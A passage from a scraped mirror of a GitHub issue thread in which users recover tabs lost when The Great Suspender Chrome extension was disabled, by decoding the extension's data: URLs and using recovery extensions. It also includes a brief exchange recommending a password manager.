A%20%20%20%20border%3A%201px%20solid%20rgba(0%2C%200%2C%200%2C%200.2)%3B%0A%20%20%20%20background-color%3A%20%23426cff%3B%0A%20%20%20%20padding%3A%2010px%3B%0A%20%20%20%20display%3A%20block%3B%0A%20%20%20%20width%3A%2010em%3B%0A%20%20%20%20margin-left%3A%20auto%3B%0A%20%20%20%20margin-right%3A%20auto%3B%0A%7D%0A%0Aspan.pageURL%20%7B%0A%20%20%20%20color%3A%20darkgrey%3B%0A%20%20%20%20font-size%3A%2013px%3B%0A%20%20%20%20word-wrap%3A%20break-word%3B%0A%7D%0A%0Aa.wakeUpButton%3Aactive%20%7B%0A%20%20%20%20background-color%3A%20%2326429c%3B%0A%7D%0A%0A%20%20%20%20%3C%2Fstyle%3E%0A%20%20%20%20%3Ctitle%3E%26%239790%3B%3C%2Ftitle%3E%0A%3C%2Fhead%3E%0A%3Cbody%3E%0A%20%20%20%20%3Cdiv%20id%3D%22info%22%3E%0A%20%20%20%20%20%20%20%20%3Ch1%3E%26quot%3B%3Cspan%20class%3D%22pageTitle%22%3E%3C%2Fspan%3E%26quot%3B%20is%20hibernating%3C%2Fh1%3E%0A%20%20%20%20%20%20%20%20%3Cp%3E%3Cspan%20class%3D%22pageURL%22%3E%3C%2Fspan%3E%3C%2Fp%3E%0A%20%20%20%20%20%20%20%20%3Cp%3E%3Ca%20class%3D%22pageURLLink%20wakeUpButton%22%3EWake%20up!%3C%2Fa%3E%3C%2Fp%3E%0A%20%20%20%20%3C%2Fdiv%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E </code></p> <p>The URL is there as url%22%3A%22https%3A%2F%2Fphotos.google.com%2F </p> <p>so you will have to translate the following:<br /> %3A=:<br /> %2F=/<br /> There is also another one which is %3F=? </p> <p>so it will take a lot of time to just figure out the URL itself which in the above is <a rel="nofollow noopener" target="_blank" href="https://photos.google.com">https://photos.google.com</a></p> <p>thankfully after googling The Great Suspender and reading all the different threads on Reddit, I found a tool called The Great Suspender Recovery Tool here:<br /> <a rel="nofollow noopener" target="_blank" href="https://www.producthunt.com/posts/the-great-suspender-recovery-tool?bc=1">https://www.producthunt.com/posts/the-great-suspender-recovery-tool?bc=1</a></p> <p>which is available on the Google Chrome Store here:<br /> <a rel="nofollow noopener" target="_blank" href="https://chrome.google.com/webstore/detail/great-suspender-recovery/ainlmpkfinfbbgdpimmldfdgpenmclmk">https://chrome.google.com/webstore/detail/great-suspender-recovery/ainlmpkfinfbbgdpimmldfdgpenmclmk</a></p> <p>This at least makes it easier because using the same links that has the problem, with The Great Suspender Recovery Tool extension, it would show up as:</p> <pre><code class="prettyprint">data:text/html;charset=utf-8,<!DOCTYPE` html>%0A<html>%0A<head>%0A <script type="text/javascript">%0A%0AArray.prototype.each = function(callback) {%0A for(var i = 0; i < this.length; i++) {%0A callback(this[i]);%0A }%0A};%0A%0ANodeList.prototype.each = Array.prototype.each;%0A%0Afunction setFavicon(faviconHref) {%0A var link = document.createElement('link');%0A link.type = 'image/x-icon';%0A link.rel = 'shortcut icon';%0A link.href = faviconHref;%0A document.getElementsByTagName('head')[0].appendChild(link);%0A}%0A%0Awindow.onload = function() {%0A var pageInfo = {"url":"https://www.cnet.com/how-to/tips-and-tricks-for-android-wear-2-0/","title":"13 Android Wear 2.0 smartwatch tips you'll love - CNET","favIconUrl":"https://cnet3.cbsistatic.com/fly/bundles/cnetcss/images/core/icon/favicon-32.png"};%0A%0A document.title = document.title + ' ' + pageInfo.title;%0A setFavicon(pageInfo.favIconUrl);%0A%0A document.querySelectorAll('.pageTitle').each(function(o) {%0A o.innerText = pageInfo.title;%0A });%0A%0A document.querySelectorAll('.pageURL').each(function(o) {%0A o.innerText = pageInfo.url;%0A });%0A%0A var restorePage = function() {%0A if (window.history.length >= 2) {%0A window.history.back();%0A } else {%0A document.location.href = pageInfo.url;%0A }%0A }%0A%0A document.querySelectorAll('a.pageURLLink').each(function(o) {%0A o.onclick = restorePage;%0A });%0A%0A document.body.onclick = restorePage;%0A%0A window.addEventListener('keyup', function(event) {%0A if (event.keyIdentifier == "U+0020") {%0A restorePage();%0A }%0A });%0A}%0A%0A </script>%0A <style>%0A%0Ahtml {%0A cursor: pointer;%0A}%0A%0Abody {%0A font-family: 'Helvetica Neue', 'Arial';%0A background-color: lightgray;%0A}%0A%0Adiv#info {%0A margin-left: auto;%0A margin-right: auto;%0A margin-top: 100px;%0A text-align: center;%0A width: 500px;%0A border-radius: 6px;%0A border: 1px solid darkgray;%0A padding: 20px;%0A background-color: white;%0A box-shadow: 0 2px 8px rgba(0, 0, 0, 0.3);%0A}%0A%0Ah1 {%0A font-size: 20px;%0A}%0A%0Aa.wakeUpButton {%0A color: white;%0A text-decoration: none;%0A border-radius: 6px;%0A border: 1px solid rgba(0, 0, 0, 0.2);%0A background-color: #426cff;%0A padding: 10px;%0A display: block;%0A width: 10em;%0A margin-left: auto;%0A margin-right: auto;%0A}%0A%0Aspan.pageURL {%0A color: darkgrey;%0A font-size: 13px;%0A word-wrap: break-word;%0A}%0A%0Aa.wakeUpButton:active {%0A background-color: #26429c;%0A}%0A%0A </style>%0A <title>&#9790;</title>%0A</head>%0A<body>%0A <div id="info">%0A <h1>&quot;<span class="pageTitle"></span>&quot; is hibernating</h1>%0A <p><span class="pageURL"></span></p>%0A <p><a class="pageURLLink wakeUpButton">Wake up!</a></p>%0A </div>%0A</body>%0A</html> </code></pre> <p>but it fixes things since all you do is paste the copied link from the extension to a text editor and then search for:<br /> "url":"</p> <p>which for the above will show:<br /> {"url":"<a rel="nofollow noopener" target="_blank" href="https://www.cnet.com/how-to/tips-and-tricks-for-android-wear-2-0/">https://www.cnet.com/how-to/tips-and-tricks-for-android-wear-2-0/</a>"</p> <p>so the URL is already there between the "url":""<br /> which saves a lot of time even though after 2 days, I still have not recover all of the tabs Google killed as I am not spending more than a few minutes per day for it. </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/78993393?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Almighty188 picture"> <strong>Almighty188</strong> <span class="text-muted ml-1">on 22 May 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@Almighty188</strong>:</p> <p>There are some chrome extensions for recovering your tabs. For example (untested):</p> <ul> <li><a rel="nofollow noopener" target="_blank" href="https://chrome.google.com/webstore/detail/the-great-desuspender/pgpmpfcpnpgnkombckgpnfkmbepockaj?hl=en">The Great Desuspender</a></li> <li><a rel="nofollow noopener" target="_blank" href="https://chrome.google.com/webstore/detail/the-great-suspender-recov/ainlmpkfinfbbgdpimmldfdgpenmclmk?hl=en">The Great Suspender Recovery Tool</a></li> </ul> <p><a rel="nofollow noopener" target="_blank" href="https://chrome.google.com/webstore/search/greatsuspender?hl=en&_category=extensions">These search results</a> might have more options.</p> <p>So you'd install one of these extensions, open your URLs from the history, and then open the extension.</p> <p>This should work. Basically, these extensions remove the part before <code>data:text/html;charset=utf-8,[...]</code>, so only the data URL remains (this is what this URL is called). Your browser then should display the content of the data URL (which is a web page).</p> <p>If that doesn't work (you have my condolence, that will be a lot of work... 😆):</p> <p>The long URLs you saw are URL encoded (which means, it's encoded data that normally wouldn't be valid in a URL).</p> <p>You can use an online tool like <a rel="nofollow noopener" target="_blank" href="https://www.urldecoder.org/">urldecoder.org</a> to decode the data. Basically, you take the part after <code>data:text/html;charset=utf-8,</code> and use it as input on urldecoder.org.</p> <p>I did that for the URL you posted above and found the following:</p> <pre><code class="prettyprint"> var pageInfo = {"url":"https://photos.google.com/","title":"Photos - Google Photos","favIconUrl":"https://ssl.gstatic.com/images/branding/product/1x/photos_64dp.png"}; </code></pre> <p>That seems to contain the URL. Just scan the decoded data (which contains many lines of code) for that line.</p> <p>For some reason, the URL you posted contains the source code (HTML, JavaScript, etc.) of a web page.</p> <p>Good luck! 😉</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/183805?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="d4h0 picture"> <strong>d4h0</strong> <span class="text-muted ml-1">on 22 May 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@d4h0</strong> </p> <p>Thanks for your input. </p> <p>As far as the tools go:<br /> 1) The Great Desuspender did not show anything at all as it was basically the same # as the browser tabs I already had opened which had nothing related to The Great Suspender.<br /> 2) The Great Suspender Recovery Tool was what I used</p> <p>I already finished recovering all 450 tabs with The Great Suspender Recovery Tool since it did the decoding part so I just had to paste into Notepad++ with CTRL-V ad then did a search for "url":" but thanks for the link to urldecoder.org. I did manage to lose one tab which was not anywhere in Chrome's history as basically I always have that tab on the right hand side of Gmail<br /> so when I have something Gmail opened in a new tab and close it, it tries to open that tab but I always put it back to sleep but since I know what it was, I just went back to Facebook groups and searched for the name of the content in that group and found it even though it took 10 minutes.</p> <p>I basically have 4 windows of tabs which contained about 100 tabs each. Window 1 was the one with the ones that I had to send to the text editor after The Great Suspender Recovery Tool already decoded the URL portion and then copy link back to a new tab on the browser. A few of the tabs did have the URL so I can just open it directly into a new tab from The Great Suspender Recovery Tool directly. Windows 2-4 all had valid URL's so I can just open it directly. So for whatever reason, I seem to be the only one who has the long encoded URLs as github's various issues from years and more recent has no mention of the long encoded URLs either. <a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/issues/526">https://github.com/greatsuspender/thegreatsuspender/issues/526</a></p> <p>Unlike people who posted months ago, there is no way to open the extension where it gets enabled for a short period of time to open the extension and save the current session, mines remains disabled even when I start Chrome offline so the only way to do it is to use either Chrome's browser history and search for klbibkeccnjlkjkiokjodocebajanakg, it is slightly easier for me because I always open all 4 windows after the computer reboots so as my computer's last boot time was on May 17, 2021, all I had to do is start from May 17 2021 and later as the last time there was anything in the history for klbibkeccnjlkjkiokjodocebajanakg was for May 16, 2021 which was before the reboot.</p> <p>Thanks for taking the time to reply although I think when I first saw the issue, the first 1/2 a day was more panic mode before finding working tools. Window 1 was the one that took the last 3 days while window 2-4 was all done within 2 hours. </p> <p>The URL posted is exactly the way it shows up in The Great Suspender Recovery Tool as seen in the screenshot below which are basically 98% of the Window 1 tabs:<br /> <a rel="nofollow noopener" target="_blank" href="https://imgur.com/a/aOo0iFx">https://imgur.com/a/aOo0iFx</a></p> <p>I am still new to Github so I am still trying to figure out how to have the code show so it doesn't get decoded by the forum. </p> <p>Update 1: I should say that I did find a use for the Great Desuspender and that is because I use TabsOutliner so I have somethings that area in TabsOutliner that opens up a suspended tab for The Great Suspender so it will say blocked by client an that's when the Great Desuspender will open the tabs to the actual site. </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/78993393?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Almighty188 picture"> <strong>Almighty188</strong> <span class="text-muted ml-1">on 23 May 2021</span> </div> <div class="col text-right"> 😄<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <blockquote> <p><strong>@timetopanic</strong> I would recommend a password manager instead of a schema. One or a few leaks and the pattern can be guessed.</p> </blockquote> <p>Do you have a recommendation for a good password manager? One that WON'T sell me out without me even knowing?</p> </blockquote> <p>Bitwarden seems to be a decent company (but do your own research and come to your own conclusions). I believe they are open source and have a self-hosted option as well.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/32683613?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="pattiobear picture"> <strong>pattiobear</strong> <span class="text-muted ml-1">on 26 May 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">3</span> 🚀<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@timetopanic</strong> Yes, like <strong>@pattiobear</strong> said: Bitwarden. I used it and I'm happy with it. Just try it out with a few sites and see if you like it. But I can tell you, having each site with its own super random password is really good. It also works wonders on my Android phone.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/11562215?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="orlandoryo picture"> <strong>orlandoryo</strong> <span class="text-muted ml-1">on 26 May 2021</span> </div> <div class="col text-right"> 🚀<span class="ml-2 mr-3">1</span> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> </div> <div class="col-12"> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown text-center helpful"> <div class="title">Was this page helpful?</div> <div class="mt-1" onMouseLeave="rating(735408387, 0);"> <i class="fas fa-star inactive" id="star-1" onMouseOver="rating(735408387, 1);" onclick="rate(735408387, 1);"></i> <i class="fas fa-star inactive" id="star-2" onMouseOver="rating(735408387, 2);" onclick="rate(735408387, 2);"></i> <i class="fas fa-star inactive" id="star-3" onMouseOver="rating(735408387, 3);" onclick="rate(735408387, 3);"></i> <i class="fas fa-star inactive" id="star-4" onMouseOver="rating(735408387, 4);" onclick="rate(735408387, 4);"></i> <i class="fas fa-star inactive" id="star-5" onMouseOver="rating(735408387, 5);" onclick="rate(735408387, 5);"></i> </div> <div class="description text-small"><span id="rating-val">0</span> / 5 - <span id="rating-count">0</span> ratings</div> </div> </div> <div class="mb-4"> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3835332123789605" data-ad-slot="3452512275" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> </div> </div> </div> </div> <div class="col-12 col-lg-4"> <div id="ph-above-related"></div> <div class="card card-custom issue-box"> <div class="card-body pt-3 pb-5"> <h2 class="mb-4">Related issues</h2> <div> <strong> <a href="/thegreatsuspender/424481148/question-optimal-state-of-proactive-tab-freeze-and-discard">[question] optimal state of "Proactive Tab Freeze and Discard" chrome flag in "chrome://flags/" for 7.1 with "Apply Chrome's built-in memory-saving when suspending" enabled</a> </strong> </div> <div class="text-muted text-small mt-2"> <img src="https://avatars.githubusercontent.com/u/48854490?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="RachelHendy picture"> <strong class="pr-1" dir="ltr">RachelHendy</strong>  ·  <span class="px-1" dir="ltr">3</span><span>Comments</span> </div> <hr /> <div> <strong> <a href="/thegreatsuspender/430249935/dark-mode-unsuspending">Dark mode unsuspending</a> </strong> </div> <div class="text-muted text-small mt-2"> <img src="https://avatars.githubusercontent.com/u/85355?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="lookfirst picture"> <strong class="pr-1" dir="ltr">lookfirst</strong>  ·  <span class="px-1" dir="ltr">3</span><span>Comments</span> </div> <hr /> <div> <strong> <a href="/thegreatsuspender/208094808/enhancement-do-not-suspend-the-last-n-used-tabs">Enhancement: Do not suspend the last N used tabs</a> </strong> </div> <div class="text-muted text-small mt-2"> <img src="https://avatars.githubusercontent.com/u/2451044?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="dumblob picture"> <strong class="pr-1" dir="ltr">dumblob</strong>  ·  <span class="px-1" dir="ltr">4</span><span>Comments</span> </div> <hr /> <div> <strong> <a href="/thegreatsuspender/242878548/location-where-saved-sessions-are-stored">Location where Saved Sessions are stored</a> </strong> </div> <div class="text-muted text-small mt-2"> <img src="https://avatars.githubusercontent.com/u/6366221?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="yuanstanley picture"> <strong class="pr-1" dir="ltr">yuanstanley</strong>  ·  <span class="px-1" dir="ltr">4</span><span>Comments</span> </div> <hr /> <div> <strong> <a href="/thegreatsuspender/258718601/link-text-as-new-suspended-tab-title">Link text as new suspended tab title</a> </strong> </div> <div class="text-muted text-small mt-2"> <img src="https://avatars.githubusercontent.com/u/2855777?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="quentincaffeino picture"> <strong class="pr-1" dir="ltr">quentincaffeino</strong>  ·  <span class="px-1" dir="ltr">3</span><span>Comments</span> </div> </div> </div> <div class="sticky-top pt-4"> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3835332123789605" data-ad-slot="3919948963" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> <div id="ph-below-related-2" class="mt-4"> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3835332123789605" data-ad-slot="3919948963" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> </div> </div> </div> <div class="col-12 col-lg-4"> </div> </div> <div class="skyscraper-container"> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3835332123789605" data-ad-slot="7879185320" data-ad-format="vertical" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> </div> </div> <div class="mt-5 spacer"></div> <footer class="mt-5 pb-2 py-4 text-center mt-auto"> <div class="container"> <a class="navbar-brand logo mr-5" href="/"> <img src="/assets/img/logo.svg" width="40" height="40" alt="bleepingcoder logo"> bleeping<strong>coder</strong> </a> <div class="mt-4"> bleepingcoder.com uses publicly licensed GitHub information to provide developers around the world with solutions to their problems. We are not affiliated with GitHub, Inc. or with any developers who use GitHub for their projects. We do not host any of the videos or images on our servers. All rights belong to their respective owners. </div> <div> Source for this page: <a href="https://www.github.com/greatsuspender/thegreatsuspender/issues/1263" rel="nofollow noreferrer" target="_blank">Source</a> </div> </div> <hr class="mb-5 mt-5"> <div class="container"> <div class="row"> <div class="col-sm-4 col-lg mb-sm-0 mb-5"> <strong>Popular programming languages</strong> <ul class="list-unstyled mb-0 mt-2"> <li class="mb-2"> <a href="/python" dir="ltr">Python</a> </li> <li class="mb-2"> <a href="/javascript" dir="ltr">JavaScript</a> </li> <li class="mb-2"> <a href="/typescript" dir="ltr">TypeScript</a> </li> <li class="mb-2"> <a href="/cpp" dir="ltr">C++</a> </li> <li class="mb-2"> <a href="/csharp" dir="ltr">C#</a> </li> </ul> </div> <div class="col-sm-4 col-lg mb-sm-0 mb-5"> <strong>Popular GitHub projects</strong> <ul class="list-unstyled mb-0 mt-2"> <li class="mb-2"> <a href="/microsoft/vscode" dir="ltr">vscode</a> </li> <li class="mb-2"> <a href="/numpy/numpy" dir="ltr">numpy</a> </li> <li class="mb-2"> <a href="/ant-design/ant-design" dir="ltr">ant-design</a> </li> <li class="mb-2"> <a href="/mui-org/material-ui" dir="ltr">material-ui</a> </li> <li class="mb-2"> <a href="/vercel/next-js" dir="ltr">next.js</a> </li> </ul> </div> <div class="col-sm-4 col-lg mb-0"> <strong>More GitHub projects</strong> <ul class="list-unstyled mb-0 mt-2"> <li class="mb-2"> <a href="/rust-lang/rust" dir="ltr">rust</a> </li> <li class="mb-2"> <a href="/moment/moment" dir="ltr">moment</a> </li> <li class="mb-2"> <a href="/yarnpkg/yarn" dir="ltr">yarn</a> </li> <li class="mb-2"> <a href="/mozilla/pdf-js" dir="ltr">pdf.js</a> </li> <li class="mb-2"> <a href="/JuliaLang/julia" dir="ltr">julia</a> </li> </ul> </div> </div> </div> <hr class="mb-5 mt-5"> <div class="container text-muted"> © 2026 bleepingcoder.com - <a href="/bleeps" rel="nofollow">Contact</a><br /> By using our site, you acknowledge that you have read and understand our <a href="/cookies" rel="nofollow">Cookie Policy</a> and <a href="/privacy" rel="nofollow">Privacy Policy</a>. </div> </footer> <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js" integrity="sha256-4+XzXVhsDmqanXGHaHvgh1gMQKX40OUvDEBTu8JcmNs=" crossorigin="anonymous"></script> <script async src="https://cdn.jsdelivr.net/npm/popper.js@1.16.0/dist/umd/popper.min.js" integrity="sha384-Q6E9RHvbIyZFJoft+2mJbHaEWldlvI9IOYy5n3zV9zzTtmI3UksdQRVvoxMfooAo" crossorigin="anonymous"></script> <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js" integrity="sha384-wfSDF2E50Y2D1uUdj0O3uMBJnjuUD4Ih7YwaYd1iqfktj0Uod8GCExl3Og8ifwB6" crossorigin="anonymous"></script> <!--<script defer type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5fb2db66acbd74b2"></script>--> <script type="text/javascript" src="/assets/js/main.js"></script> <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script></body> </html>